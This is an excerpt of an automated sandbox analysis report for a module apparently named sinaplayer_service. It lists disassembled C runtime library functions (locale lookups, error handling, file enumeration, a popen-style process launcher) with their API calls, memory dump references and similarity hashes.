                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locale__crt$Infowcschrwcscmpwcslenwcsncpy_s$CodeDefaultNamePageUserValid_getptd_itow_s_wtol
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2649615383-0
                                                                                                                                                                                                    • Opcode ID: 30a317f97d28a565fccd3d7e72888dfe699373eb0f8fea542f4f040982fd2cb9
                                                                                                                                                                                                    • Instruction ID: 2f96c8af3b1cfe4b719936b8ff27d678dd2b4e6af92276ca60037e4fe95b7150
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30a317f97d28a565fccd3d7e72888dfe699373eb0f8fea542f4f040982fd2cb9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D510772A48242AAFB15ABB5CC41FBF73ECFF05344F094429EA59DB182FB70D54096A1
                                                                                                                                                                                                    Function 6D0A7FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcscmp.MSVCR120(?,ACP,0000009C,?,6D0A809C,?,0000009C,?,00000000,00000055,00000000,?,6D0A81D9,?,?,?), ref: 6D0A8008
                                                                                                                                                                                                    • wcscmp.MSVCR120(?,OCP,0000009C,?,6D0A809C,?,0000009C,?,00000000,00000055,00000000,?,6D0A81D9,?,?,?), ref: 6D0A801D
                                                                                                                                                                                                    • _wtol.MSVCR120(?,0000009C,?,6D0A809C,?,0000009C,?,00000000,00000055,00000000,?,6D0A81D9,?,?,?), ref: 6D0A802D
                                                                                                                                                                                                      • Part of subcall function 6D09C8E3: wcstol.MSVCR120(?,00000000,0000000A,?,6D1299C5,?,?,?,6D129BDB,?,00000000), ref: 6D09C8ED
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,20001004,?,00000002,0000009C,?,6D0A809C,?,0000009C,?,00000000,00000055,00000000,?,6D0A81D9,?), ref: 6D0B3813
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,2000000B,?,00000002,0000009C,?,6D0A809C,?,0000009C,?,00000000,00000055,00000000,?,6D0A81D9,?), ref: 6D0E0519
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoLocale__crtwcscmp$_wtolwcstol
                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                    • API String ID: 1531225338-711371036
                                                                                                                                                                                                    • Opcode ID: a31e81e23d03a25154c2ea8fa17d16c3ff79ae23c5c5fc6366876c4538d10ce6
                                                                                                                                                                                                    • Instruction ID: a518ae0d61631de614b26393821f907364afd5a9ddab410d49680bf72a728cf7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a31e81e23d03a25154c2ea8fa17d16c3ff79ae23c5c5fc6366876c4538d10ce6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC01C07214C1566AFB009A99EC81FAB37E8EF053D4F448011FA18EB182EF71E64086E4
                                                                                                                                                                                                    Function 6D12996B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcscmp.MSVCR120(?,ACP,?,?,6D129BDB,?,00000000), ref: 6D129982
                                                                                                                                                                                                    • wcscmp.MSVCR120(?,OCP,?,?,6D129BDB,?,00000000), ref: 6D129993
                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,6D129BDB,?,00000000), ref: 6D1299AF
                                                                                                                                                                                                    • _wtol.MSVCR120(?,?,?,6D129BDB,?,00000000), ref: 6D1299C0
                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,6D129BDB,?,00000000), ref: 6D1299D9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoLocalewcscmp$_wtol
                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                    • API String ID: 3515354035-711371036
                                                                                                                                                                                                    • Opcode ID: 06d72f1239ec266bf9ca9dd0ff77f933590f6e1d028d99d5146b4a00d13fb051
                                                                                                                                                                                                    • Instruction ID: 543ccb8449bf49640bc073ed32106518bcda5ae1b06bd19e9f74f4aeddd1fcae
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06d72f1239ec266bf9ca9dd0ff77f933590f6e1d028d99d5146b4a00d13fb051
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A018032284156ABEF019F5CDC50FEA3BA8AF09675B008019FA48DE095F7A2D5C0C7C0
                                                                                                                                                                                                    Function 6D0F1D6D Relevance: 9.2, APIs: 6, Instructions: 229memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0F0FCE: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCMT ref: 6D0F0FF8
                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::AdjustAllocationIncrease.LIBCMT ref: 6D0F1EF0
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 6D0F1F65
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCMT ref: 6D0F1F94
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 6D0F1FBE
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCMT ref: 6D0F1FC7
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 6D0F1FDC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::$Manager::Resource$Cores$AllocationCoreDistributePrepareReceiversTransfer$AdjustBorrowedDataExclusiveGlobalHandleIdleIncreaseProxy::ResetScheduler
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 912522943-0
                                                                                                                                                                                                    • Opcode ID: 0794facf088872c7d98497a5bf15cc8704173fadcf00802c4ad8f689fd845be9
                                                                                                                                                                                                    • Instruction ID: 96c6477026ffec008c7fab0ee5a418a873cf15e405e0680531321199230fcd6e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0794facf088872c7d98497a5bf15cc8704173fadcf00802c4ad8f689fd845be9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68915BB1E04216DFDB08CF69C594A6DB7F6FF48304B2186ADD845AB745C730E992CB82
                                                                                                                                                                                                    Function 6D0ED846 Relevance: 9.2, APIs: 6, Instructions: 175COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0A3AF4: TlsGetValue.KERNEL32(6D0A3DF7,00000000,00000000,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A3AFA
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120 ref: 6D0ED8C3
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E7774,6D15CF5C), ref: 6D0ED8F1
                                                                                                                                                                                                      • Part of subcall function 6D0EDCC4: ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR120(00000000), ref: 6D0EDCE1
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000004,?,00000000), ref: 6D0ED8DC
                                                                                                                                                                                                      • Part of subcall function 6D0F3BC9: __EH_prolog3_catch.LIBCMT ref: 6D0F3BD0
                                                                                                                                                                                                      • Part of subcall function 6D0F3BC9: InterlockedPopEntrySList.KERNEL32(?,?,?,6D0D3091,00000000,00000000), ref: 6D0F3BF1
                                                                                                                                                                                                      • Part of subcall function 6D0F3BC9: __crtGetTickCount64.MSVCR120(?,?,?,6D0D3091,00000000,00000000), ref: 6D0F3C14
                                                                                                                                                                                                    • Concurrency::details::WorkItem::BindTo.LIBCMT ref: 6D0ED983
                                                                                                                                                                                                      • Part of subcall function 6D0F669C: Concurrency::details::InternalContextBase::PrepareForUse.LIBCMT ref: 6D0F66BE
                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCMT ref: 6D0ED9B0
                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCMT ref: 6D0ED9CE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::$Base::ContextInternal$??0exception@std@@ReleaseSchedulerSpin$BindConcurrency@@Count64EntryExceptionH_prolog3_catchInterlockedItem::ListOnce@?$_PrepareThrowTickValueWait@$00@details@Work__crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328105426-0
                                                                                                                                                                                                    • Opcode ID: bba2134e52d1dc77fde887062536dd3a64a60da074788588e1c1fce72c7d673f
                                                                                                                                                                                                    • Instruction ID: 8672ed8e80dc3f408ae1bbd66cfe0828a865737a4d818877679d7ee35c45359b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bba2134e52d1dc77fde887062536dd3a64a60da074788588e1c1fce72c7d673f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E051B172A14115AFE708DFA4CC80FBDB378FF85754F018259EA2667291DB71AD05CBA0
                                                                                                                                                                                                    Function 6D09CADD Relevance: 9.1, APIs: 6, Instructions: 100COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,6D09CBBA,00000010,?,00000000,0000000A,00000000), ref: 6D0D4166
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,6D09CBBA,00000010,?,00000000,0000000A,00000000), ref: 6D0D4170
                                                                                                                                                                                                    • _errno.MSVCR120(762306A0,?,00000000,?,6D09CBBA,00000010,?,00000000,0000000A,00000000), ref: 6D0D417C
                                                                                                                                                                                                    • _errno.MSVCR120(762306A0,?,00000000,?,6D09CBBA,00000010,?,00000000,0000000A,00000000), ref: 6D0D4186
                                                                                                                                                                                                    • _errno.MSVCR120(0000000A,762306A0,?,00000000,?,6D09CBBA,00000010,?,00000000,0000000A,00000000), ref: 6D0D41AA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(762306A0,?,00000000,?,6D09CBBA,00000010,?,00000000,0000000A,00000000), ref: 6D0D41B1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2819658684-0
                                                                                                                                                                                                    • Opcode ID: dea5b091f72f7a48e888e6ccef4a73393b70c24eab73c1da3d0af656f801356b
                                                                                                                                                                                                    • Instruction ID: 9a9897f82d0fd89de33087bd0aed1afb20a8cc6e3404ed40cae26a4dbc1ebba7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dea5b091f72f7a48e888e6ccef4a73393b70c24eab73c1da3d0af656f801356b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6031AD79B54306ABEB458F38C88179E73A6EFAD750F209026E514CF250E770C8519796
                                                                                                                                                                                                    Function 6D0A1A74 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,00000080,00000000,00000000,?,00000000,?,?,?,?,6D0A1B76,00000080,?,00000080,?,?), ref: 6D0A1A9B
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,00000080,00000000,00000000,00000080,?,?,?,00000080,?,?,00000000), ref: 6D0A1AFF
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,?,00000000,00000000,?,?,?,?,00000080,?,?,?), ref: 6D0A1B23
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000,?,?,?,?,00000080,?,?,?,00000080,?,?,00000000), ref: 6D0A1B2C
                                                                                                                                                                                                    • malloc.MSVCR120(?,00000080,?,?,?,00000080,?,?,00000000), ref: 6D0E010F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoLocale__crt$ByteCharMultiWide_freea_smalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3955243501-0
                                                                                                                                                                                                    • Opcode ID: 181ff27066d5e201a53e6e97cbdcfec401f700ee7d82746ef4a0608b9cb50e74
                                                                                                                                                                                                    • Instruction ID: 47aff35db858320e622a6c5475efe8df073de7ecc6ec6375608acbf528f83dd5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 181ff27066d5e201a53e6e97cbdcfec401f700ee7d82746ef4a0608b9cb50e74
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7210432914116ABFF118FD5DC40FAF7BE9EB86760B58415AFD1897212EB31C810C7A1
                                                                                                                                                                                                    Function 6D0FC385 Relevance: 7.5, APIs: 5, Instructions: 49fileCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000244,?,6D0FC48E,6D163B90,00000000), ref: 6D0FC39C
                                                                                                                                                                                                      • Part of subcall function 6D092226: malloc.MSVCR120(6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D092237
                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,00000000,?,6D0FC48E,6D163B90,00000000), ref: 6D0FC3BD
                                                                                                                                                                                                    • FindFirstFileExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,6D0FC48E,6D163B90,00000000), ref: 6D0FC3D6
                                                                                                                                                                                                    • FindNextFileA.KERNEL32(?,6D0FC48E,6D163B90,00000000), ref: 6D0FC3FD
                                                                                                                                                                                                    • FindClose.KERNEL32(?,6D0FC48E,6D163B90,00000000), ref: 6D0FC40D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Find$CloseFile$FirstNext_malloc_crtmalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1203757345-0
                                                                                                                                                                                                    • Opcode ID: 75a1c4990817e160ced78af9f4c5cfdabff23c6e7aa8925ab8098083ac04f615
                                                                                                                                                                                                    • Instruction ID: b7960de8b5443b053e347f23c937d1579c5fea9f51193df926bb2440eb86ee43
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75a1c4990817e160ced78af9f4c5cfdabff23c6e7aa8925ab8098083ac04f615
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC0108351052A5AFEF118FA5F989B763BB8FF073A5B68011AFC0889250DBB08453DA94
                                                                                                                                                                                                    Function 6D105C14 Relevance: 105.4, APIs: 54, Strings: 6, Instructions: 443stringprocessCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1415 6d105c14-6d105c44 call 6d08ed7e 1418 6d105c46-6d105c51 _errno call 6d124670 1415->1418 1419 6d105c5d-6d105c69 1415->1419 1423 6d105c56-6d105c58 1418->1423 1421 6d105c6b 1419->1421 1422 6d105c6e-6d105c71 1419->1422 1421->1418 1424 6d105c73-6d105c77 1422->1424 1425 6d105c6d 1422->1425 1426 6d106105-6d10610a call 6d08edc3 1423->1426 1427 6d105c79-6d105c7b 1424->1427 1428 6d105c7d 1424->1428 1425->1422 1427->1418 1427->1428 1430 6d105c80-6d105c84 1428->1430 1430->1430 1432 6d105c86-6d105c8a 1430->1432 1433 6d105c94-6d105c99 1432->1433 1434 6d105c8c-6d105c8e 1432->1434 1435 6d105ca2-6d105ca4 1433->1435 1436 6d105c9b-6d105ca0 1433->1436 1434->1433 1437 6d105c90-6d105c92 1434->1437 1438 6d105cab-6d105cc6 call 6d121d74 1435->1438 1439 6d105ca6 1435->1439 1436->1438 1437->1418 1437->1433 1442 6d106103 1438->1442 1443 6d105ccc-6d105cd2 1438->1443 1439->1438 1442->1426 1444 6d105cd4-6d105cdd 1443->1444 1445 6d105cdf-6d105ce5 1443->1445 1446 6d105ce8-6d105cf5 call 6d0945f8 1444->1446 1445->1446 1449 6d105cf7-6d105d09 call 6d094ea2 * 2 1446->1449 1450 6d105d0e-6d105d53 call 6d08edd7 GetCurrentProcess DuplicateHandle 1446->1450 1449->1423 1456 6d1060d2 1450->1456 1457 6d105d59-6d105d81 call 6d094ea2 _fdopen 1450->1457 1459 6d1060d5-6d1060da 1456->1459 1457->1456 1465 6d105d87-6d105d94 call 6d10613c 1457->1465 1461 6d1060e6-6d1060eb 1459->1461 1462 6d1060dc-6d1060e5 call 6d094ea2 1459->1462 1466 6d1060f7-6d1060fe call 6d10610e 1461->1466 1467 6d1060ed-6d1060f6 call 6d094ea2 1461->1467 1462->1461 1474 6d105d9a-6d105db0 __wdupenv_s 1465->1474 1475 6d1060bc-6d1060d0 call 6d094f9e 1465->1475 1466->1442 1467->1466 1477 6d105db2-6d105db5 1474->1477 1478 6d105dc5-6d105dcd 1474->1478 1475->1459 1482 6d105dc1-6d105dc3 1477->1482 1483 6d105db7-6d105dbc call 6d12469b 1477->1483 1479 6d105dd7-6d105e04 call 6d091533 1478->1479 1480 6d105dcf-6d105dd4 1478->1480 1487 6d105e06-6d105e0c 1479->1487 1488 6d105e0e-6d105e13 1479->1488 1480->1479 1482->1478 1482->1480 1483->1482 1489 6d105e16-6d105e1e 1487->1489 1488->1489 1490 6d105e20 1489->1490 1491 6d105e23-6d105e65 call 6d0929af * 3 _calloc_crt 1489->1491 1490->1491 1498 6d1060b9 1491->1498 1499 6d105e6b-6d105e7c call 6d0947cd 1491->1499 1498->1475 1502 6d105e82-6d105e95 call 6d0ae676 1499->1502 1503 6d105f56-6d105f58 1499->1503 1502->1503 1507 6d105e9b-6d105eac call 6d0ae676 1502->1507 1506 6d105f62-6d105f64 1503->1506 1508 6d105f66-6d105f85 call 6d08ece0 * 4 1506->1508 1509 6d105f87 1506->1509 1507->1503 1519 6d105eb2-6d105ed7 call 6d091533 _errno call 6d0fe270 1507->1519 1550 6d105f2b-6d105f35 _errno 1508->1550 1511 6d105f8a-6d105f9e __getpath 1509->1511 1514 6d106064-6d106074 call 6d08ece0 * 2 1511->1514 1515 6d105fa4-6d105fa7 1511->1515 1536 6d106077-6d106094 call 6d08ece0 * 2 CloseHandle 1514->1536 1515->1514 1520 6d105fad-6d105fbd call 6d0929af 1515->1520 1543 6d105ed9-6d105ef8 CreateProcessA 1519->1543 1544 6d105efd-6d105f12 _calloc_crt 1519->1544 1532 6d105fc3-6d105fcd call 6d10e5b2 1520->1532 1533 6d10604f-6d106051 1520->1533 1534 6d105fcf 1532->1534 1533->1534 1539 6d105fd1-6d105fe6 call 6d0ae676 1534->1539 1540 6d105fec-6d106007 call 6d0929af * 2 1534->1540 1562 6d106096-6d106099 CloseHandle 1536->1562 1563 6d10609b-6d1060aa _errno 1536->1563 1539->1503 1539->1540 1565 6d106061 1540->1565 1566 6d106009-6d106018 call 6d0ae676 1540->1566 1543->1536 1546 6d105f14-6d105f28 call 6d08ece0 * 3 1544->1546 1547 6d105f3a-6d105f4f __wdupenv_s 1544->1547 1546->1550 1547->1509 1555 6d105f51-6d105f54 1547->1555 1550->1498 1555->1503 1555->1506 1562->1563 1567 6d1060b6 1563->1567 1568 6d1060ac-6d1060b4 1563->1568 1565->1514 1566->1503 1573 6d10601e-6d10602b call 6d0fe270 1566->1573 1567->1498 1568->1466 1576 6d106056-6d10605c 1573->1576 1577 6d10602d-6d10604d CreateProcessA 1573->1577 1576->1511 1577->1514
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(6D106120,0000009C), ref: 6D105C46
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D106120,0000009C), ref: 6D105C51
                                                                                                                                                                                                    • __pipe.LIBCMT(?,00000400,00000000,6D106120,0000009C), ref: 6D105CBB
                                                                                                                                                                                                    • _close.MSVCR120(?,?,?,?,?,?,?,?,6D106120,0000009C), ref: 6D105CFA
                                                                                                                                                                                                    • _close.MSVCR120(?,?,?,?,?,?,?,?,?,6D106120,0000009C), ref: 6D105D02
                                                                                                                                                                                                    • _lock.MSVCR120(00000009,?,?,?,?,?,?,?,6D106120,0000009C), ref: 6D105D10
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6D106120,0000009C), ref: 6D105D1F
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000002,?,?,?,?,?,?,?,6D106120,0000009C), ref: 6D105D4B
                                                                                                                                                                                                    • _close.MSVCR120(?,?,?,?,?,?,?,?,6D106120,0000009C), ref: 6D105D5D
                                                                                                                                                                                                    • _fdopen.MSVCR120(?,00000077,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D105D72
                                                                                                                                                                                                    • _idtab.LIBCMT ref: 6D105D89
                                                                                                                                                                                                    • __wdupenv_s.LIBCMT(?,00000000,COMSPEC), ref: 6D105DA6
                                                                                                                                                                                                      • Part of subcall function 6D125072: _lock.MSVCR120(00000007,6D125150,00000010,6D0FF6AB,00000000,00000000,00000000,?,00000000,?,?,?,6D0FFF5D,00000000,00000000,00000000), ref: 6D125085
